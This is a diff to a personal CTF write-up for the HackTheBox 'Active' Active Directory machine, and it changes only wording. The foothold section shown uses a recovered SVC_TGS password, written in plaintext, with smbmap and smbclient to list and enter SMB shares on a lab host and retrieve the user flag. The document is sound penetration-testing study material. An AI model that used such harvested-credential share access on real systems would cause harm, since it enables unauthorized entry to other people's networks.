gabriele-annese/-computer-science-Notes/CyberSecurity/CTF/HackTheBox/AD/Active.md

 ## FootHold
-Now that we have a credential for `SVC_TGS` account try to check if we are able to connect in other shares
+Now that we have a credential for `SVC_TGS` account try to check if we are able to connect into other shares
 ```bash
 smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.129.213.81
 ```
 ![[Pasted image 20250607162052.png]]

-Now connect to the smb share `Users` and navigate under the user's desktop to find the user.txt flag ``
+Now connect to the smb share `Users` and navigate under the user's desktop to find the user.txt flag
 ```bash
 smbclient  //10.129.213.81/Users -U "active.htb\SVC_TGS"
 smb: \SVC_TGS\Desktop\> cd SVC_TGS\Desktop